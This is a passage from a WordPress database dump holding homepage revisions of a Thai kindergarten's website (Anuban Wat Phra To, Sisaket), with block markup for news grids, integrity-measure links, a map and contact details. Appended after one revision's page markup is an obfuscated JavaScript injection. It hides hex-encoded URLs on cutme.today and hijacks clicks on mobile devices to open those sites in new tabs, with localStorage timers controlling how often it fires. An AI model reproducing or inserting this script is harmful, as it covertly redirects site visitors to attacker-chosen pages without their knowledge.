900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:19:48','2024-08-29 07:19:48','',19,'http://watprato.ssk.in.th/?p=266',0,'revision','',0),
(267,2,'2024-08-29 14:21:37','2024-08-29 07:21:37','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} 